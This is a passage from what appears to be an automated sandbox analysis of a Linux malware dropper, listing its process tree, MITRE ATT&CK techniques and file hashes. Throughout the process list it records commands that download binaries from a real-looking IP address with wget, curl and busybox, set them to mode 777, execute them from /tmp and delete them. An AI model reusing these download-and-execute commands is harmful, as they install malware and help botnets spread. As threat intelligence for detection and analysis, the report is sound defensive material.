  - /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | ./phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 890 | Executes dropped EXE, System Network Configuration Discovery
  - /bin/rm | rm phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 891 | System Network Configuration Discovery
  - /usr/bin/wget | wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 892
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 893 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 894
  - /bin/chmod | chmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 895 | File and Directory Permissions Modification
  - /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | ./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 896 | Executes dropped EXE
  - /bin/rm | rm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 897
  - /usr/bin/wget | wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 898
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 899 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 900
  - /bin/chmod | chmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 901 | File and Directory Permissions Modification
  - /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | ./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 902 | Executes dropped EXE
  - /bin/rm | rm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 903
  - /usr/bin/wget | wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 904
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 905 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 906
  - /bin/chmod | chmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 908 | File and Directory Permissions Modification
  - /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | ./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 909 | Executes dropped EXE
  - /bin/rm | rm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 910
  - /usr/bin/wget | wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 911
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 913 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 914
  - /bin/chmod | chmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 915 | File and Directory Permissions Modification
  - /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | ./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 916 | Executes dropped EXE
  - /bin/rm | rm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 917
  - /usr/bin/wget | wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 918
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 919 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 920
  - /bin/chmod | chmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 921 | File and Directory Permissions Modification
  - /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | ./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 922 | Executes dropped EXE
  - /bin/rm | rm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 923
  - /usr/bin/wget | wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 924
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 925 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 926
  - /bin/chmod | chmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 927 | File and Directory Permissions Modification
  - /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | ./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 928 | Executes dropped EXE
  - /bin/rm | rm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 929
Network
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1)
    - Linux and Mac File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1)
    - System Checks (1)
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97